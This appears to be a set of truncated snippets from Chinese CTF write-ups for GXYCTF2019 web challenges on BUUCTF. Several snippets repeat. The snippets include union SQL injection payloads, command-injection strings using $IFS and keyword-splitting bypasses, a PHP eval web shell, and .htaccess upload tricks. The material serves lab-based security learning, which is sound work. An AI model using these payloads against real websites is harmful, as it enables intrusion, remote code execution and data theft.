[GXYCTF2019]BabySQli1打开实例发现是个登录页，查看源代码未发现有效信息，admin登录,显示密码错误，发现参数name和pw查看源代码发现base编码解密发现是base32+base64混合编码，并发现解密后的SQL语句，判断注入点为usernameselect*fromuserwhereusername='$name'尝试万

打开页面如下：按提示输入ip127.0.0.1尝试加管道符，查看目录结构，?ip=127.0.0.1|lscat查看flag.php他骂我们，说空格不行。使用其他字符替换空格，?ip=127.0.0.1|cat$IFS$9flag.php又骂我们，说flag字符串不行，我们先看看index.php，直接审计代码看看怎么绕过，?ip=127.0.0.1|cat$IFS$

题目链接：[GXYCTF2019]BabySQli。个人认为这道题是脑洞题（当然也跟基础业务知识不够有关）。打开题目后环境如下。只有一个登录框，因此常规操作，先测试一下看看。通过多次输入不同的UserName、password发现，存在admin用户，并且可以遍历UserName。接下来尝试注入，发现似乎只有

题目链接：https://buuoj.cn/challenges#[GXYCTF2019]PingPingPing打开环境后如下所示。题目直接提示了有一个GET参数，参数名是"ip"，尝试输入：?ip=127.0.0.1后，结果如下所示。可以看到，网站后端进行了一个ping操作，猜测参数：ip可能存在命令注入漏洞。尝试输入：ip=;id，发现可以

题目链接：https://buuoj.cn/challenges#[GXYCTF2019]PingPingPing打开环境后如下所示。题目直接提示了有一个GET参数，参数名是"ip"，尝试输入：?ip=127.0.0.1后，结果如下所示。可以看到，网站后端进行了一个ping操作，猜测参数：ip可能存在命令注入漏洞。尝试输入：ip=;id，发现可以

这题查看源码后发现一个php文件问了ai后发现MMZFM422K5HDASKDN5TVU3SKOZRFGQRRMMZFM6KJJBSG6WSYJJWESSCWPJNFQSTVLFLTC3CJIQYGOSTZKJ2VSVZRNRFHOPJ5是一段base32编码，经过base32解码，base64解码后的结果是select*fromuserwhereusername='$name'很明显是一个sql语句，在us

打开靶机，上传文件抓包后缀不能带ph，大小写也无法绕过，意味着phtml后缀也无法上传对后缀只过滤ph，我们转变思路上传图片马，用.htaccess使图片马以php格式打开上传图片马上传失败，试一试过滤了哪些字符文件内容过滤了<?我们尝试另一种写法后成功上传<scriptlanguage="php">eval

这题用御剑扫描不出来什么结果，最后看大佬的wp发现这题使用githack扫出来的首先来收一下git源码泄露的原因：开发人员在开发的时候，常常会先把源码提交到远程托管网站（如github），最后在从远程托管网站把源码pull到服务器的web目录下，如果忘记把.git文件删除，就会造成此漏洞。利用.git

[GXYCTF2019]BabySQli非常神奇的一道题，漏洞利用点在于联合查询时如果数据不存在，则会创建一个临时虚拟用户于是当前尝试username=admin，返回wrongpass则该用户名存在所以username：1'unionselect1,'admin','202cb962ac59075b964b07152d234b70'#(202cb962ac59075b964b07152

[GXYCTF2019]PingPingPing（命令执行绕过总结）题目来源收录于：BUUCTFGXYCTF2019题目描述提示较为明确，get方法传参127.0.0.1后结果如下比较容易想到联合执行命令，先看有哪些文件尝试直接读取flag.php读取失败，对空格进行了过滤。题解以下内容参考文章：https://blog

首先尝试一下分号有没有被过滤：?ip=127.0.0.1;ls;可以看见分号没有被过滤，看到了flag.php和index.php两个文件，先尝试能不能打开flag.php：?ip=127.0.0.1;catflag.php;能看出空格被过滤了，我们用$IFS$1绕过空格：?ip=127.0.0.1;cat$IFS$1flag.php;可以看见flag也被过滤了，我们打开i

[GXYCTF2019]禁止套娃1打开题目之后什么都没看到所以进行常规的检测漏洞，扫描目录发现存在.git文件夹下的文件存在#DirsearchstartedSunMar1015:19:392024as:D:\Python\Scripts\dirsearch-uhttp://849b4a98-3df3-4abb-927e-1a358a178e30.node5.buuoj.cn:81/-x429

文件上传例题：[GXYCTF2019]BabyUpload打开网址明显文件上传上传简单php马尝试后缀名过滤，使用BP抓包进行修改提示文件类型不对，修改成image/jpeg提示还是php，那换成js马<scriptlanguage="php">eval($_POST['cmd']);</script>上传成功解析php代码需要.htaccess文件在文

[GXYCTF2019]禁止套娃打开环境没有发现什么提示，使用dirsearch扫描目录，发现git泄露。通过githack下载源码<?phpinclude"flag.php";echo"flag在哪里呢？<br>";if(isset($_GET['exp'])){if(!preg_match('/data:\/\/|filter:\/\/|php:\/\/|phar:\

[GXYCTF2019]BabySQli打开是一个登录页面任意输入账号密码提示wronguser输入admin提示wrongpass，说明有admin的账号并且在页面源代码中发现一串经过编码后的字符串经过base32和base64解码后得到SQL语句使用万能密码进行尝试，得到donothackme！的结果根据源码提示，我

[GXYCTF2019]BabyUpload打开靶场看到个上传文件的选项，应该是上传文件漏洞上传个一句话木马文件尝试<?phpeval($_POST['cmd']);?>提示不能带有php的后缀改成jpg后缀，提示“上传类型也太露骨了吧！”修改了Content-Type为image/jpeg还是不行换了一种一句话木马GIF89a<sc

[GXYCTF2019]PingPingPing1审题由标题和内容，我们可以想到Linux的命令执行。并且由内容/?ip=，看出用GET注入ip变量来读取flag知识点Linux的命令执行，空格的绕过知识点详解在Linux中，竖线符号"|"和分号符号";"具有不同的作用。竖线符号"|"(管道符号)：在Linux

题目附件如下。<?phpsession_start();echo"<metahttp-equiv=\"Content-Type\"content=\"text/html;charset=utf-8\"/><title>Upload</title><formaction=\"\"method=\"post\"enctype=\

原理.git泄露，githack获取源码无参RCE执行解题过程进入靶场，每看到有用的信息，那就只能目录扫描了，扫到了.git目录，就用githack获取源码<?phpinclude"flag.php";echo"flag在哪里呢？<br>";if(isset($_GET['exp'])){if(!preg_match('/data:\/\/|filter:\/\/|php:\/

原理RCE命令执行的多种绕过姿势解题过程进入靶场提示要传递参数ip那就传递一下127.0.0.1,结果正常试试进行拼接，试了127.0.0.1&&ls或者127.0.0.1&ls都不行，，，直到用；做连接符才可以payload:127.0.0.1;ls发现有index.php和flag.php文件，猜测flag应该在flag.php内接着尝试读取

本题目是一道联合注入进入页面后发现只有一个登录框。知识点unionselect联合查询union拼接的两个查询语句查询字段数必须一样多当其中一个查询结果为空时，不影响另外一个语句的查询结果联合注入核心是使用拼接的select语句同时使原查询语句结果为空来覆盖原查询结果，从而实

[GXYCTF2019]PingPingPing题目来源：buuctf题目类型：web涉及考点：命令执行1.题目页面如下：我们将其作为参数传入，/?ip=127.0.0.1，回显如下：接下来通过命令行查看目录：/?ip=127.0.0.1;ls2.发现了flag.php，直接查看/?ip=127.0.0.1;catflag.php发现空格被过滤了，我们采取以下

https://buuoj.cn/challenges#[GXYCTF2019]%E7%A6%81%E6%AD%A2%E5%A5%97%E5%A8%83.git泄露，使用GitHackindex.php<?phpinclude"flag.php";echo"flag在哪里呢？<br>";if(isset($_GET['exp'])){if(!preg_match('/data:\/\/|fil

先尝试输入ip=127.0.0.1发现啥也没有再次在后面输入ls查看文件发现有两个文件Cat一下发现有空格过滤进行空格绕过$(IFS)（?ip=127.0.0.1;cat$IFS$1flag.php）发现符合也进行了过滤尝试进行拼接flag?ip=127.0.0.1;a=g;cat$IFS$1fla$a.php发现flag